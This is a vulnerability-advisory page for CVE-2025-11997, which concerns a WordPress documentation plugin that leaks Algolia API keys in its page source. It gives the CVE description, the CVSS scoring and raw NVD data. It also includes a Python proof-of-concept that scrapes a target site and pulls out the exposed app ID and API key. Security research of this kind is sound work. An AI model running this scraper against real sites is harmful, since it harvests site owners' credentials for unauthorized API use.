Security Vulnerability Report
中文
CVE-2025-11997 CVSS 5.3 MEDIUM

CVE-2025-11997

Published: 2025-11-11 04:15:45
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Document Pro Elementor – Documentation & Knowledge Base plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.9. This is due to the plugin exposing sensitive Algolia API keys through the frontend JavaScript code via wp_localize_script without proper access restrictions. This makes it possible for unauthenticated attackers to view sensitive API keys in the page source, which could be leveraged to make unauthorized API calls to the configured Algolia search service.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Document Pro Elementor plugin <= 1.0.9 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11997 PoC - Information Disclosure # Description: Document Pro Elementor plugin exposes Algolia API keys via frontend JavaScript import requests from bs4 import BeautifulSoup import re import json def exploit_cve_2025_11997(target_url): """ Exploit for CVE-2025-11997 Extracts sensitive Algolia API keys from WordPress page source """ print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-11997...") try: # Fetch the target page response = requests.get(target_url, timeout=30) if response.status_code != 200: print(f"[-] Failed to fetch page. Status: {response.status_code}") return None # Parse HTML to find exposed JavaScript data soup = BeautifulSoup(response.text, 'html.parser') # Search for wp_localize_script data containing Algolia keys algolia_keys = {} # Method 1: Search in script tags for localized data scripts = soup.find_all('script') for script in scripts: script_text = script.string if script.string else '' # Look for Algolia configuration if 'algolia' in script_text.lower() or 'dpAlgolia' in script_text: # Extract App ID app_id_match = re.search(r'["\']appId["\'\s:]+["\']([^"\']+)["\']', script_text, re.IGNORECASE) if app_id_match: algolia_keys['app_id'] = app_id_match.group(1) # Extract API Key api_key_match = re.search(r'["\']apiKey["\'\s:]+["\']([^"\']+)["\']', script_text, re.IGNORECASE) if api_key_match: algolia_keys['api_key'] = api_key_match.group(1) # Method 2: Search in inline JavaScript variables inline_patterns = [ r'var\s+\w+\s*=\s*\{[^}]*appId[^}]*\}', r'window\.dpAlgolia\s*=\s*\{[^}]*\}', r'algoliaConfig\s*=\s*\{[^}]*\}' ] for pattern in inline_patterns: matches = re.findall(pattern, response.text, re.IGNORECASE | re.DOTALL) for match in matches: print(f"[+] Found potential config: {match[:200]}...") # Report findings if algolia_keys: print("\n[+] SUCCESS! Exposed Algolia credentials found:") print(f" App ID: {algolia_keys.get('app_id', 'N/A')}") print(f" API Key: {algolia_keys.get('api_key', 'N/A')}") print("\n[!] These keys can be used to access Algolia API") return algolia_keys else: print("[-] No Algolia keys found in page source") return None except Exception as e: print(f"[-] Error: {str(e)}") return None def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-11997 """ print("[*] Checking if target is vulnerable...\n") result = exploit_cve_2025_11997(target_url) if result: print("\n[✓] Target is VULNERABLE to CVE-2025-11997") return True else: print("\n[✗] Target may NOT be vulnerable or plugin not installed") return False if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] else: target = "http://example.com" # Replace with target URL check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11997", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:45.293", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Document Pro Elementor – Documentation & Knowledge Base plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.9. This is due to the plugin exposing sensitive Algolia API keys through the frontend JavaScript code via wp_localize_script without proper access restrictions. This makes it possible for unauthenticated attackers to view sensitive API keys in the page source, which could be leveraged to make unauthorized API calls to the configured Algolia search service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/document-pro-elementor/tags/1.0.9/inc/Base/DPET_Enqueue.php#L71", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/document-pro-elementor/tags/1.0.9/inc/Base/DPET_Enqueue.php#L85", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5ac7455a-0c89-4f5b-84eb-b7cc87bce8d4?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.